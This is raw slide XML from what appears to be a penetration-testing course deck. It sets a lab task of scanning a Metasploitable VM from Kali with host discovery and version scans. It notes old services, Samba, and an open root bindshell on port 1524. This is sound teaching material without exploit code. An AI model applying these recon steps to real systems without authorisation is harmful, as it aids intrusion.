                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ancient. Not directly exploitable, but it tells you the whole box is from 2008.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897880" y="3913632"/>
            <a:ext cx="5742432" cy="1024128"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6250"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153912" y="4032504"/>
            <a:ext cx="5303520" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Samba 3.X</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153912" y="4352544"/>
            <a:ext cx="5303520" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SMB with no version pinned. Enumerate it by hand, that is where shares live.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897880" y="5084064"/>
            <a:ext cx="5742432" cy="1024128"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6250"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153912" y="5202936"/>
            <a:ext cx="5303520" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>bindshell on 1524</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153912" y="5522976"/>
            <a:ext cx="5303520" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A root shell already listening. Somebody left a door wide open.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897880" y="6327648"/>
            <a:ext cx="5669280" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1820"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Version numbers are the whole game.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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170A2E"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text 0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="384048"/>
            <a:ext cx="5486400" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="160" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HANDS-ON  //  TASK 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13889"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>10 min</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="749808"/>
            <a:ext cx="9144000" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Map the target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1517904"/>
            <a:ext cx="10789920" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Goal: turn an IP address into a list of services with version numbers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2121408"/>
            <a:ext cx="11091672" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1728"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1038"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2377440"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT TO DO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2761488"/>
            <a:ext cx="10424160" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Boot Kali and Metasploitable, confirm both have an address on the same host-only network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Find the target with a host discovery scan, do not guess the IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Run a version scan on all ports and save it with -oA task1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Pick the three oldest looking services and write down the exact version strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Bonus: run --top-ports 20 as a UDP scan and see what appears that TCP missed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>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22</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B0711"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4297680" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="12082A"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2011680"/>
            <a:ext cx="3291840" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="2788920"/>
            <a:ext cx="6675120" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983480" y="3657600"/>
            <a:ext cx="6583680" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The step beginners skip and</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>professionals spend most of their time on.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>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23</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03 / ENUMERATION</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From an open port to a way in</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24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="11091672" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6364"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
